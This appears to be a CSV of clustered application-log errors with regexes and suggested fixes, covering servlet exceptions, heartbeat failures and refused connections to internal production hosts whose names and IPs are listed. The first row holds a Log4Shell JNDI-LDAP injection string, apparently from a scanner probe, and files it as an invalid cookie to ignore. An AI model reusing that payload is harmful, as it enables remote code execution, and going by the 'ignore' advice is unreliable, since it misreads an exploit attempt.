Cluster,Error Example,Error Regex,Error Solution
1.0,a cookie header was received [${jndi:ldap://log4shell-generic-8molyf0ab2aqtscsyugh${lower:ten}.w.nessus.org/nessus}=${jndi:ldap://log4shell-generic-8molyf0ab2aqtscsyugh${lower:ten}.w.nessus.org/nessus};],cookie header was received.*invalid cookie,Ignore the invalid cookie in the received header.
2.0,servlet.service() for servlet [dispatcherservlet] in context with path [] threw exception,servlet.service\(\) for servlet \[dispatcherservlet\] threw exception,Handle the exception thrown by the servlet service.
3.0,discoveryclient_rdd-async-service/p1049433.prod.cloud.fedex.com:rdd-async-service:6521 - was unable to send heartbeat!,discoveryclient.*unable to send heartbeat,Investigate and resolve the issue related to sending heartbeat.
4.0,"exception processing errorpage[errorcode=0, location=/error]",exception processing errorpage\[errorcode=\d+.*location=\/error\],Handle the exception in the error processing code.
5.0,"request execution failed with message: i/o error on put request for """": connect to rddgwslas03.prod.cloud.fedex.com:8094 [rddgwslas03.prod.cloud.fedex.com/10.228.54.50] failed: connection refused (connection refused); nested exception is org.apache.http.conn.httphostconnectexception: connect to rddgwslas03.prod.cloud.fedex.com:8094 [rddgwslas03.prod.cloud.fedex.com/10.2","request execution failed with message: i/o error on put request for """".*connect to .* failed: connection refused",Investigate the connection issue to the specified host.
6.0,"request execution failed with message: i/o error on get request for """": connect to rddgwsatl04.prod.cloud.fedex.com:8094 [rddgwsatl04.prod.cloud.fedex.com/10.52.77.32] failed: connection refused (connection refused); nested exception is org.apache.http.conn.httphostconnectexception: connect to rddgwsatl04.prod.cloud.fedex.com:8094 [rddgwsatl04.prod.cloud.fedex.com/10.52.77.32] failed: connection refused (connection refused)","request execution failed with message: i/o error on get request for """".*connect to .* failed: connection refused",Investigate the connection issue to the specified host.
7.0,"request execution failed with message: i/o error on put request for """": connect to rddgwsatl02.prod.cloud.fedex.com:8094 [rddgwsatl02.prod.cloud.fedex.com/10.52.172.30] failed: connection refused (connection refused); nested exception is org.apache.http.conn.httphostconnectexception: connect to rddgwsatl02.prod.cloud.fedex.com:8094 [rddgwsatl02.prod.cloud.fedex.com/10.5","request execution failed with message: i/o error on put request for """".*connect to .* failed: connection refused",Investigate the connection issue to the specified host.
,,ee,s
